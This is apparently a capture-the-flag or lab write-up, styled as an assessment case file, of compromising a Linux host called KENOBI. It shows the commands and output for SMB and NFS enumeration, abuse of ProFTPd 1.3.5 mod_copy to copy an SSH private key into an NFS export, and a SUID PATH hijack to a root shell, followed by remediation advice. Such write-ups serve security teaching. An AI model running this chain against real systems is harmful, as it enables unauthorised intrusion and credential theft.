Samba enumeration, ProFTPd mod_copy, and SUID PATH hijack
Linux host assessment: anonymous SMB and NFS exposure, unauthenticated ProFTPd 1.3.5 SITE CPFR/CPTO abuse to exfiltrate an SSH private key, then PATH hijack of a SUID menu binary to root.
- Case files
- Samba enumeration, ProFTPd mod_copy, and SUID PATH hijack
Target KENOBI exposed FTP, SSH, HTTP, RPC/NFS, and Samba. We chained anonymous share access, NFS mount of /var, and ProFTPd mod_copy into SSH as kenobi, then escalated via a SUID binary that invoked curl from PATH.
Versioned TCP scan identified seven open ports including ProFTPD 1.3.5, OpenSSH, Apache, rpcbind, Samba, and NFS.
Anonymous Samba share exposed log.txt. NFS showmount listed /var with world-readable contents including tmp — the staging area for the stolen key.
Banner grab confirmed 1.3.5. searchsploit listed mod_copy RCE. SITE CPFR/CPTO copied /home/kenobi/.ssh/id_rsa into /var/tmp, then we mounted NFS and SSH’d in.
find located /usr/bin/menu with the SUID bit. Option 1 invoked curl from PATH. We planted /tmp/curl → /bin/sh and prepended /tmp to PATH for a root shell.
Engagement summary
Target KENOBI exposed FTP, SSH, HTTP, RPC/NFS, and Samba. We chained anonymous share access, NFS mount of /var, and ProFTPd mod_copy into SSH as kenobi, then escalated via a SUID binary that invoked curl from PATH.
This case covers a Linux boot-to-root against host KENOBI (10.10.101.17). Initial access did not require credentials: Samba allowed anonymous read of an operational log, NFS exported /var, and ProFTPD 1.3.5 accepted unauthenticated SITE CPFR/CPTO to copy kenobi’s SSH private key into the NFS export. Privilege escalation abused /usr/bin/menu, a SUID binary that executed curl without a full path.
Business impact
Anonymous file shares plus a known FTP RCE pattern yielded interactive SSH. A single SUID helper with relative binary resolution completed the path to root. Remediate by disabling anonymous SMB/NFS, patching or removing ProFTPd 1.3.5, and removing or rewriting SUID helpers that shell out to PATH-resolved tools.
Service discovery
Versioned TCP scan identified seven open ports including ProFTPD 1.3.5, OpenSSH, Apache, rpcbind, Samba, and NFS.
OPERATOR · NMAP
savvy@lab:~$ nmap 10.10.101.17 -sV -Pn
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs 2-4 (RPC #100003)
Service Info: Host: KENOBI; OS: Linux
SMB and NFS enumeration
Anonymous Samba share exposed log.txt. NFS showmount listed /var with world-readable contents including tmp — the staging area for the stolen key.
OPERATOR · SMB ENUM
savvy@lab:~$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.101.17
| smb-enum-shares:
| \\10.10.101.17\anonymous: Anonymous access: READ/WRITE
| \\10.10.101.17\IPC$: Anonymous access: READ/WRITE
| \\10.10.101.17\print$: Anonymous access: <none>
OPERATOR · SMBCLIENT
savvy@lab:~$ smbclient //10.10.101.17/anonymous
Password for [WORKGROUP\operator]:
smb: \> ls
log.txt N 12237 Wed Sep 4 16:19:09 2019
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt
log.txt documented SSH key generation for user kenobi and confirmed ProFTPD on port 21. We next enumerated NFS via rpcbind.
OPERATOR · NFS
savvy@lab:~$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.101.17
| nfs-showmount:
|_ /var *
| nfs-ls: Volume /var
| backups cache crash local lock log snap www
ProFTPd 1.3.5 mod_copy → SSH key theft
Banner grab confirmed 1.3.5. searchsploit listed mod_copy RCE. SITE CPFR/CPTO copied /home/kenobi/.ssh/id_rsa into /var/tmp, then we mounted NFS and SSH’d in.
OPERATOR · BANNER
savvy@lab:~$ nc 10.10.101.17 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.101.17]
OPERATOR · SEARCHSPLOIT
savvy@lab:~$ searchsploit ProFTPD 1.3.5
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
mod_copy implements SITE CPFR and SITE CPTO for unauthenticated filesystem copies. We copied kenobi’s private key into the NFS-exported /var/tmp path.
OPERATOR · MOD_COPY
savvy@lab:~$ nc 10.10.101.17 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.101.17]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
OPERATOR · NFS MOUNT + SSH
savvy@lab:~$ mkdir /mnt/kenobiNFS
savvy@lab:~$ mount 10.10.101.17:/var /mnt/kenobiNFS
savvy@lab:~$ cp /mnt/kenobiNFS/tmp/id_rsa .
savvy@lab:~$ chmod 600 id_rsa
savvy@lab:~$ ssh kenobi@10.10.101.17 -i id_rsa
Welcome to Ubuntu 16.04.6 LTS
savvy@lab:~$
SUID menu binary and PATH hijack
find located /usr/bin/menu with the SUID bit. Option 1 invoked curl from PATH. We planted /tmp/curl → /bin/sh and prepended /tmp to PATH for a root shell.
OPERATOR · SUID ENUM
savvy@lab:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu
/usr/bin/sudo
# … standard SUID helpers omitted
OPERATOR · MENU
savvy@lab:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
OPERATOR · PATH HIJACK
savvy@lab:~$ cd /tmp
savvy@lab:/tmp$ echo /bin/sh > curl
savvy@lab:/tmp$ chmod 777 curl
savvy@lab:/tmp$ export PATH=/tmp:$PATH
savvy@lab:/tmp$ /usr/bin/menu
** Enter your choice :1
#
Remediation
Remove SUID from non-essential binaries. If a helper must call external tools, use absolute paths and drop privileges. Patch ProFTPd, disable anonymous Samba/NFS, and rotate any SSH keys that left the host.